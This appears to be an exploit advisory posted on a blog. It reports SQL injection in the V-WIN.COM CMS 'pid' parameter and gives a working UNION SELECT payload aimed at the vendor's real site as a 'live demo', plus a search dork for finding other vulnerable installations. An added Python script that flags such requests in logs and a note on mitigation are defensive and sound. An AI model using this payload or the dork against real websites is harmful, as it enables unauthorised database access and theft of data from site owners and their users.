WEB-CMS - V-WIN.COM CMS - SQL Injection Vuln [private script]


[o] WEB-CMS - V-WIN.COM CMS SQL Injection Vulnerability
Software : WEB-CMS - V-WIN.COM CMS [MALAYSIA WEBSITE CONTENT MANAGEMENT SYSTEM]
Vendor : http://www.v-win.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


[o] Exploit
http://localhost/[path]/?page=pri&pid=[SQL Query]


[o] Live Demo
http://www.v-win.com/cms/?page=pri&pid=-131+union+select+1,2,3,database(),version(),6--


[o] Dork
"Concept, Designed, and Maintained by www.v-win.com"
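
Added example, not part of the original advisory and not code from the vendor: a log check for the injection point shown above, flagging requests to page=pri whose pid is not a plain integer. The Apache combined log format, the sample lines, and the assumption that legitimate pid values are non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /cms/?page=pri&pid=131 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2010:10:00:05 +0000] "GET /cms/?page=pri&pid=-131+union+select+1,2,3,database(),version(),6-- HTTP/1.1" 200 4875 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2010:10:00:09 +0000] "GET /cms/?page=pri&pid=131%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2010:10:00:12 +0000] "GET /cms/?page=news&id=4 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.8 - - [01/Jan/2010:10:00:15 +0000] "GET /cms/?page=pri&pid=12&pid=0+or+1=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
'''

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Assumption: legitimate pid values are non-negative integer row ids.
NUMERIC_ID = re.compile(r'[0-9]{1,10}')


def suspicious_pid_requests(log_text):
    """Return (client, decoded pid) for page=pri requests with a non-integer pid."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target = m.groups()
        # parse_qs URL-decodes values ('+' -> space, %27 -> ') and keeps repeats,
        # so a second pid parameter cannot hide behind a clean first one.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "pri" not in params.get("page", []):
            continue  # only the page named in the advisory is checked here
        for value in params.get("pid", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, pid in suspicious_pid_requests(SAMPLE_LOG):
        print(f"{client}\tpid={pid!r}")
```

The same integer-only rule, enforced server-side before pid reaches the query (together with a parameterized statement), closes the injection point rather than only detecting its use.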


Comments

labatterie said…
Don't know how to use this vulnerability.